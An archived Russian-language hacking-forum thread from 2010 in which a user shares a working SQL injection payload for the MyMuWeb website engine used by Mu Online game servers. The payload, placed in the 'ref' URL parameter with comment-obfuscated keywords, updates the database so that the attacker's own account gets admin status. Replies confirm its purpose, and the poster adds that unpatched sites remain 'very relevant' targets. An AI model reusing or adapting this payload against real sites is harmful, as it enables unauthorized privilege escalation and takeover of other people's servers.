Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Скуль в популярном движке сайта для MuOnline серверов.

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Скуль в популярном движке сайта для MuOnline серверов.
Имя
Сообщение << Старые топики   Новые топики >>
Скуль в популярном движке сайта для MuOnline серверов. - 2010-07-22 01:01:14.966666   
DeepBlue7.

Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
 Ну вот на днях нарыл интиресную уязвимость в одном из популярнейших движков сайта для серверов Mu Online.

MyMuWeb называется (100% известно что уязвимы 0.7 и 0.6 версии).

Само дырко http://localhost/?ref='updаtе/**/MeMB_INFo/**/seT/**/mmw_status='9'/**/WhErE/**/memb___id='Ваш логин'--&ref=Сущиствующий на сервере логин (можно и свой)--
Post #: 1
RE: Скуль в популярном движке сайта для MuOnline серверов. - 2010-07-22 01:12:10.400000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

http://localhost/?ref='updаtе/**/MeMB_INFo/**/seT/**/mmw_status='9'/**/WhErE/**/memb___id='Ваш логин'–&ref=Сущиствующий на сервере логин (можно и свой)–

Мы себя админами чтоли делаем?
Post #: 2
RE: Скуль в популярном движке сайта для MuOnline серверов. - 2010-07-22 01:16:55.520000   
DeepBlue7.

Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
 Угу.
Post #: 3
RE: Скуль в популярном движке сайта для MuOnline серверов. - 2010-07-24 23:31:56.640000   
DeepBlue7.

Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
 Фикс уже вышел, но всё ещё оч актуально :)
Post #: 4
Страниц:  [1]
Все форумы >> [Уязвимости] >> Скуль в популярном движке сайта для MuOnline серверов.







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.